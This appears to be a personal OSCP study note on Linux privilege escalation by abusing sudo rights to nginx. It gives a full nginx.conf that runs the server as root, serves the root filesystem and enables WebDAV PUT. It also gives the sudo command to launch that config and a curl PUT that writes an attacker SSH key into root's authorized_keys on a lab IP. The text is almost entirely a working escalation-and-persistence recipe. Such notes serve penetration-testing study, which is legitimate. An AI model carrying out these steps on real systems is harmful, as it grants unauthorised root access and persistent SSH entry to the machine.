// notes/ PrivEsc — Linux
🐧

Nginx

Having sudo access to /usr/sbin/nginx we can web server as root as access the filesystem (read and write) using root privileges.

#linux privilege escalation#adot8
source · oscp.adot8.com · linux-privilege-escalation/nginx

Nginx

Having sudo access to /usr/sbin/nginx we can web server as root as access the filesystem (read and write) using root privileges.

<figure><img src="/files/wwcKFFUCBEguLDu3eoQu" alt=""><figcaption></figcaption></figure>

{% hint style="info" %} Change the user in the nginx.conf file to root {% endhint %}

<figure><img src="/files/4sDwDMHPKqedC8JcdiDG" alt=""><figcaption></figcaption></figure>
bash
$cat nginx.conf | grep -v '\#'|grep . > /tmp/nginx.conf

New nginx.conf file

code
01user root;
02worker_processes auto;
03events {
04 worker_connections 768;
05}
06http {
07server {
08 listen 1338;
09 server_name localhost;
10 root /;
11 dav_methods PUT;
12 autoindex on;
13
14 }
15}
  • user will be root
  • the server will listen on 1338
  • the directory will be /
  • dav_methods allows us to use the PUT method to update files
  • autoindex allows up to browse the filesystem
bash
$sudo /usr/sbin/nginx -c /tmp/nginx.conf

Visit http://<IP>:1338 and view filesystem using the root user

<figure><img src="/files/OHMV8xiiMKaB8IwpH7OE" alt=""><figcaption></figcaption></figure>

Create add a new public key to roots authorized_keys file

code
01ssh-keygen
02curl -X PUT http://10.10.11.243:1338/root/.ssh/authorized_keys -d 'public key'